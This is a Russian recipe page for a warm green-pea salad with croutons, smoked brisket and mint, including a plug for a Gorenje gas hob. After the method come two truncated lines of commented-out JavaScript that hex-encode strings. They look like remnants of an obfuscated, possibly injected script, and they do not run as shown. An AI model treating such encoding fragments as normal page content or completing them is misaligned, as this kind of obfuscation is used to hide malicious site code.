Теплый салат с горошком

Шикарный теплый салат можно приготовить из обычного зеленого горошка, буквально минут за пятнадцать. Его секрет-хрустящие гренки из чиабатты, румяные ломтики копченой грудинки и теплый пикантный соус-винегрет.  В этом салате присутствуют  сразу два идеальных горошковых спутника-копченая грудинка и свежая мята, сочетание убойное и беспроигрышное!

И конечно не обошлось без помощи  газовой варочной поверхности GW65CLI от «Gorenje»

Ингредиенты:

1.Горошек замороженный 400 грамм

2.Чиабата 3 ломтика

3.Грудинка копченая 50 грамм

4.Лук шалот 2 шт.

5.Мята свежая 3 веточки

6.Масло оливковое 3 ст.л.

7.Масло сливочное 1 ст.л.

8.Уксус бальзамический 2 ст.л.

9.Горчица неострая 1 ч.л.

10.Соль

11.Перец черный

Готовим!

1.Грудинку нарезать тонкими ломтиками. Обжарить на хорошо разогретой сковороде о румяности и вынуть на бумажное полотенце. Отлить половину вытопившегося жира. Чиабатту нарезать крупными кубиками и обжарить в оставшемся жире до румяности. Вынуть гренки из сковороды. Отлитый жир вернуть в сковороду, добавить оливковое масло и добавить мелко порубленный лук шалот. Готовить лук на небольшом огне до мягкости. Влить уксус, добавить горчицу, посолить и поперчить соус и снять сковороду с огня. В чистом сотейнике растопить сливочное масло. Всыпать горошек и готовить 5 минут, помешивая. Снять сотейник с горошком с огня, влить теплый соус, положить обжаренную грудинку, гренки и перемешать. Посыпать мятой и подавать.

 

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o

Читайте также:

Добавить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *